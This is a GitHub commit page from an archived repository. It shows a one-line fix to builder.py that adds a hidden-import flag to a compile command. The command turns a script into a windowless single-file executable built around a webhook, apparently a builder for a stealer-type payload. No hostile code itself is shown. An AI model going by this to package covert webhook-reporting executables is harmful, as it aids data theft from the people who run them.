Skip to content
This repository has been archived by the owner on Jun 7, 2022. It is now read-only.

Commit

Permalink
fix: _cffi_backend bug
Browse files Browse the repository at this point in the history
  • Loading branch information
3ct0s committed Jan 26, 2022
1 parent 4c7f182 commit e63f45a
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion builder.py
Original file line number Diff line number Diff line change
Expand Up @@ -47,7 +47,7 @@ def build(webhook: str, out_file: str):
else:
exit("\n[-] OS not supported\n")

compile_command += [out_file + ".py", "--onefile", "--noconsole", f"--icon={path.join('img','exe_file.ico')}"]
compile_command += [out_file + ".py", "--onefile", "--noconsole", "--hidden-import=_cffi_backend", f"--icon={path.join('img','exe_file.ico')}"]

try:
command_result = run(args=compile_command, stdout=PIPE, stderr=PIPE)
Expand Down

0 comments on commit e63f45a

Please sign in to comment.